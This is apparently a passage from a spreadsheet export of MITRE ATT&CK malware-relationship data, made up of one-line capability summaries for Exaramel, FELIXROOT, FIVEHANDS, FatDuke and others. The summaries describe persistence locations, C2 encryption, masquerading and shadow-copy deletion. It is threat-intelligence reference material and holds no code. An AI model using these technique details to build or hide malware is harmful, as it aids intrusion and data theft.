    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can uninstall its persistence mechanism and delete its configuration file.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--9cc847b7-61ae-46f7-ab06-16560775d44b</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a command to download a file from  and to a remote C2 server.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--15bb2796-7c6d-4d03-8d86-8d83254bcf0b</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses RC4 for encrypting the configuration.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--db1b7307-a473-40eb-be9c-25d95c0e2054</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can execute commands with high privileges via a specific binary with setuid functionality.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--c8a0012e-9b2c-4fef-8aeb-7bc77d1b16c3</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can run &lt;code&gt;whoami&lt;/code&gt; to identify the system owner.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--23f656c7-600f-46a7-8185-0edf45299bac</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--9a24e972-81d5-4cfc-81ed-3e7752e3b463</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a command to execute a shell command on the system.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--db451851-13b7-4aec-9146-2a770115140a</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses HTTPS for C2 communications.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--4528e56e-6c64-4eef-853d-d4011a9ea7ef</t>
  </si>
  <si>
    <t xml:space="preserve">[Exaramel for Windows](https://attack.mitre.org/software/S0343) automatically encrypts files before sending them to the C2 server.(Citation: ESET TeleBots Oct 2018) </t>
  </si>
  <si>
    <t>relationship--1631a8e5-36e6-4468-9ed6-48df1138461c</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) stores the backdoor's configuration in the Registry in XML format.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>relationship--5f3176fa-827b-4c3c-ba71-6e8ef6cdebb9</t>
  </si>
  <si>
    <t xml:space="preserve">[Exaramel for Windows](https://attack.mitre.org/software/S0343) specifies a path to store files scheduled for exfiltration.(Citation: ESET TeleBots Oct 2018) </t>
  </si>
  <si>
    <t>relationship--ce4321e0-09e0-4e3a-b673-8a6e9248e720</t>
  </si>
  <si>
    <t>The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>relationship--cc4635e6-bc84-4c22-a3e0-d09a57f3a888</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) adds the configuration to the Registry in XML format.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>relationship--ab11615f-a0d9-43c9-b71e-6ae83155bf3b</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to execute VBS scripts on the victim’s machine.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>relationship--3456ec22-b2ac-470d-8a01-f5d5797a3521</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to launch a remote shell and executes commands on the victim’s machine.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>relationship--b8987cc5-08cb-484e-877f-438706f25915</t>
  </si>
  <si>
    <t>The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV.”(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>relationship--90b9f240-cd40-488a-9bbc-bb0c5db07365</t>
  </si>
  <si>
    <t>S0361</t>
  </si>
  <si>
    <t>Expand</t>
  </si>
  <si>
    <t>tool--ca656c25-44f1-471b-9d9f-e2a3bbb84973</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to decompress a local or remote CAB file into an executable.(Citation: Microsoft Expand Utility)</t>
  </si>
  <si>
    <t>relationship--31fa2481-0b4f-40d4-b438-1d04a7eb0888</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to download or upload a file over a network share.(Citation: LOLBAS Expand)</t>
  </si>
  <si>
    <t>relationship--6aa9250e-cbe8-4f47-9aef-bb178c2b6677</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to download or copy a file into an alternate data stream.(Citation: LOLBAS Expand)</t>
  </si>
  <si>
    <t>relationship--78775a68-6973-43b1-a3d9-a1c9c93c5a3f</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to use the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>relationship--b2553142-9377-42b3-9fd6-50fcbd4263b3</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) can scan all .exe files located in the USB drive.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>relationship--50b2e4e3-8740-463b-87fc-e96c4b62fbe5</t>
  </si>
  <si>
    <t>[Explosive](https://attack.mitre.org/software/S0569) has commonly set file and path attributes to hidden.(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t>relationship--d80d5ba4-22ea-4ef4-94e6-f9fbaa3ca641</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to download a file to the infected system.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>relationship--a4e88205-c591-4bad-9daa-0bf8f6049c57</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has leveraged its keylogging capabilities to gain access to administrator accounts on target servers.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--56694ef7-3ce3-4d8a-914b-71a201dc5921</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to write itself to Registry values.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>relationship--178116a9-6ac9-45c0-bc74-36fe9ba12686</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to call the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015)  </t>
  </si>
  <si>
    <t>relationship--afcc8ef7-cc5e-4e3b-a430-acafb12f5844</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has encrypted communications with the RC4 method.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--87480e5f-2284-43cb-86e6-01c0c49c2c23</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has collected the computer name from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>relationship--c0220333-2cfb-4449-acbb-9bea0b7751b4</t>
  </si>
  <si>
    <t xml:space="preserve"> [Explosive](https://attack.mitre.org/software/S0569) has collected the MAC address from the victim's machine.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>relationship--00038d0e-7fc7-41c3-9055-edb4d87ea912</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has collected the username from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>relationship--6b1fd87c-b8d1-4ea1-9cc3-bc4fb1cd2fbd</t>
  </si>
  <si>
    <t>[Explosive](https://attack.mitre.org/software/S0569) has used HTTP for communication.(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t>relationship--aae10582-ba88-4a02-9d66-fd460bf4f303</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can delete malware and associated artifacts from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>relationship--3b32f3be-5bdd-4de8-9e39-83b0b8c1e70f</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can search files on a victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>relationship--27834043-1004-4a70-9023-a318bd6db7c6</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) uses fake Transport Layer Security (TLS) to communicate with its C2 server.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>relationship--f77c9b92-0800-4631-b669-524c8ab23772</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) encrypts C2 data with RC4 encryption.(Citation: US-CERT FALLCHILL Nov 2017)(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--35f02c40-d46f-44fa-8ba2-5106357494b4</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>relationship--5dd257c0-c2cb-422a-9991-93ff667c5ad6</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) collects MAC address and local IP address information from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>relationship--760be456-6b72-4b86-b5aa-3297aa89bc4d</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can modify file or directory timestamps.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>relationship--3017cf15-f6a8-4281-8c74-9dd8f7c2666f</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) has been installed as a Windows service.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>relationship--ee1a14f3-9e2e-44a5-8d1f-4a093dbd0c94</t>
  </si>
  <si>
    <t>S0267</t>
  </si>
  <si>
    <t>FELIXROOT</t>
  </si>
  <si>
    <t>malware--cf8df906-179c-4a78-bd6e-6605e30f6624</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts collected data with AES and Base64 and then sends it to the C2 server.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>relationship--ab62293d-8f89-46b5-bab1-f7b564f5996f</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the .LNK file from the startup directory as well as the dropper components.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>relationship--fa745ba0-428f-4c3c-84be-e333f659690f</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) downloads and uploads files to and from the victim’s machine.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--e4c5ab65-e084-4844-9bf8-546d78f20e96</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the Registry key &lt;code&gt;HKCU\Software\Classes\Applications\rundll32.exe\shell\open&lt;/code&gt;.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>relationship--321c1e2e-c295-42db-87cf-4d71f6c7f164</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts strings in the backdoor using a custom XOR algorithm.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--43908728-be5a-4bdf-a13e-8d373c1fc4fd</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects a list of running processes.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--058c67f3-9345-42be-a433-a4cea314d26d</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</si>
  <si>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</si>
  <si>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relationship--4f5c53df-7076-4580-bd45-c4c9201269ae</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) adds a shortcut file to the startup folder for persistence.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--eaed4cbc-d5d1-4274-af09-62d98ae1afc7</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses Rundll32 for executing the dropper program.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--b697e1d0-b537-4be0-bd16-fd3f7ade80e8</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) checks for installed security software like antivirus and firewall.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--433eeadb-2011-476e-833a-7541df07d432</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) creates a .LNK file for persistence.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--e394c235-8567-4198-9559-fb3952672fe0</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects the victim’s computer name, processor architecture, OS version, volume serial number, and system type.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--4bd74c6c-9e4f-4048-b968-13319d68ff00</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects information about the network including the IP address and DHCP server.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--75a8e452-5a08-45c8-b194-ace6788c3c4f</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects the username from the victim’s machine.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--d9d7d861-66c9-469e-8baa-d72c7844a40f</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) gathers the time zone information from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--8b6dbaf7-d578-4bc6-8f16-07e7c1aeedc8</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses HTTP and HTTPS to communicate with the C2 server.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--518e99d1-d80e-4a5c-9b47-301da8b501e4</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--e73efb12-ee40-4896-8df6-c0c8b6cb0c92</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses WMI to query the Windows Registry.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>relationship--8a9e5785-f1cb-4127-9045-07e7bba11e80</t>
  </si>
  <si>
    <t>S0618</t>
  </si>
  <si>
    <t>FIVEHANDS</t>
  </si>
  <si>
    <t>malware--f464354c-7103-47c6-969b-8766f0157ed2</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) can receive a command line argument to limit file encryption to specified directories.(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>relationship--35887eab-0306-4e28-910d-2235207cc621</t>
  </si>
  <si>
    <t>24 June 2021</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) can use an embedded NTRU public key to encrypt data for ransom.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>relationship--93f1d277-685d-46ee-a796-a50641364fbc</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) has the ability to decrypt its payload prior to execution.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>relationship--afd2f545-557a-4113-bc0a-3191e71bcbea</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions.(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>relationship--66b5808f-b124-4736-bb6b-289503d07fa2</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) has the ability to delete volume shadow copies on compromised hosts.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--9a91c3cf-b39d-470f-85fc-14bbebe39e98</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) can enumerate network shares and mounted drives on a network.(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>relationship--422b117a-9cb1-4d03-9b2d-000de5d8526e</t>
  </si>
  <si>
    <t>The [FIVEHANDS](https://attack.mitre.org/software/S0618) payload is encrypted with AES-128.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>relationship--ba97fa9c-949b-4e86-b537-e828b602e39f</t>
  </si>
  <si>
    <t>[FIVEHANDS](https://attack.mitre.org/software/S0618) can use WMI to delete files on a  target machine.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--15e5da78-6475-426e-acd0-09f8a59ca0bb</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) employs the same encoding scheme as [SPACESHIP](https://attack.mitre.org/software/S0035) for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--f9669551-29f8-4aaf-83b9-50e541bbdced</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</si>
  <si>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</si>
  <si>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relationship--18324fed-7770-4768-b652-59860ac4782f</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</si>
  <si>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</si>
  <si>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relationship--e30a790b-8f09-4bdc-8116-275d00880333</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--512e16e9-634c-45d3-b569-c25a3072bbdc</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) stages data it copies from the local system or removable drives in the "%WINDIR%\$NtUninstallKB885884$\" directory.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--e5728c4d-d404-44e8-9e28-3411942c5234</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) achieves persistence by making an entry in the Registry's Run key.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--3ebad12d-fd33-4289-93dc-1f5af5e90b66</t>
  </si>
  <si>
    <t>[FLIPSIDE](https://attack.mitre.org/software/S0173) uses RDP to tunnel traffic from a victim environment.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>relationship--e3b79cfa-6ea8-4e7a-85f8-9862702d466a</t>
  </si>
  <si>
    <t>[FYAnti](https://attack.mitre.org/software/S0628) has the ability to decrypt an embedded .NET module.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--c9759e33-1cdd-472a-b3fc-f3263f218fdb</t>
  </si>
  <si>
    <t>[FYAnti](https://attack.mitre.org/software/S0628) can search the &lt;code&gt;C:\Windows\Microsoft.NET\&lt;/code&gt; directory for files of a specified size.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--807b9e89-a895-4c9b-aace-1d1ced5824b9</t>
  </si>
  <si>
    <t xml:space="preserve">[FYAnti](https://attack.mitre.org/software/S0628) can download additional payloads to a compromised host.(Citation: Securelist APT10 March 2021)	 </t>
  </si>
  <si>
    <t>relationship--3b4dc8f1-51c3-41bb-82a7-a877e5618ab7</t>
  </si>
  <si>
    <t>[FYAnti](https://attack.mitre.org/software/S0628) has used ConfuserEx to pack its .NET module.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--e7169b87-569a-4433-b7f5-f4cdfb43d8fa</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) contains a keylogger module.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--bfd49393-75b6-4e67-af74-4bf3c87624b0</t>
  </si>
  <si>
    <t>Some variants of [FakeM](https://attack.mitre.org/software/S0076) use SSL to communicate with C2 servers.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--090813dc-b370-42e1-a211-4d9e3247968a</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</si>
  <si>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</si>
  <si>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relationship--d8c5b193-b49d-4c0e-a9da-072302ff47a0</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</si>
  <si>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</si>
  <si>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relationship--4b6bee9b-469e-48ce-84fa-5322de03470a</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has been packed with junk code and strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--f1a70ff1-a4e7-437e-96fd-8017feea0b5a</t>
  </si>
  <si>
    <t>24 September 2020</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can copy files and directories from a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--96a31073-f6b7-463d-9816-d59014ba4adc</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can decrypt AES encrypted C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--fbe5352c-7c4f-437c-a439-d212ba6d439b</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has used several C2 servers per targeted organization.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--4e2842c6-ce4c-4204-9f29-4442a1859f12</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can secure delete its DLL.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--8600308b-3a73-40bd-bca0-970477ca11fb</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can enumerate directories on target machines.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--ea6a1c47-237a-4bc6-a048-9f45dd48fe02</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--733eae48-a5e2-4e82-b4a6-950c7a660e7e</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has attempted to mimic a compromised user's traffic by using the same user agent as the installed browser.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--10d0c930-1470-4d2e-aff8-0bf42c42d2f0</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can call &lt;code&gt;ShellExecuteW&lt;/code&gt; to open the default browser on the URL localhost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--67c21ae7-5dc3-4439-b5d1-df937abac3ad</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can use base64 encoding, string stacking, and opaque predicates for obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--7b17bab3-6c5a-4db2-969b-7724f71afc09</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has the ability to execute PowerShell scripts.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--cbb5c722-bc07-4f35-a8cd-d6e1acc839d5</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can list running processes on the localhost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--7380936d-51af-4ee3-b729-9c56a203bdee</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can get user agent strings for the default browser from &lt;code&gt;HKCU\Software\Classes\http\shell\open\command&lt;/code&gt;.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--052c54bf-b92b-4a7e-bca4-bc884437a327</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has used &lt;code&gt;HKLM\SOFTWARE\Microsoft\CurrentVersion\Run&lt;/code&gt; to establish persistence.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--603725ac-1b50-482d-b3f5-f657fdd082af</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can execute via rundll32.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--b244899c-bb0a-46c0-8f38-23d867a8a8b2</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has been regularly repacked by its operators to create large binaries and evade detection.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--6af4810f-3abe-43eb-92b0-ee8fefc2a4b9</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can AES encrypt C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--d6a29b67-d323-4579-9c8e-1c95a0ea7c20</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can collect the user name, Windows version, computer name, and available space on discs from a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--4f5fd1ed-a91e-4a9e-b2e8-6c45cc31e065</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can identify the MAC address on the target computer.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--3b81ee4f-c583-477f-b2e4-d1801da7bac8</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can turn itself on or off at random intervals.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--3056fa10-d4a3-4830-96b7-987b10b5ae70</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can be controlled via a custom C2 protocol over HTTP.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--277c6e7e-8c39-4c41-ac6f-f740bfb862b8</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) can download files from remote servers.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--e9011839-ca57-434d-a0cc-007594247110</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) has masqueraded as legitimate Adobe Content Management System files.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--2843ccc2-4869-48a0-8967-b9856a778a2c</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) checks for processes associated with anti-virus vendors.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--863c1d57-db93-49a9-a953-eb7c2d6b2e5b</t>
  </si>
  <si>
    <t>Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom method for C2 traffic that utilizes Base64.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--bd41e985-806d-4bc5-b7ef-fd00fc96cd3c</t>
  </si>
  <si>
    <t>Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--fa035513-59b6-4f54-8b85-13ec08849453</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the system information, including hostname and OS version, and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--9f653750-2ee6-4d00-906b-c71f1d217288</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the victim LAN IP address and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>relationship--c74cbdc5-e454-4b22-957e-926854dd37f1</t>
  </si>
  <si>
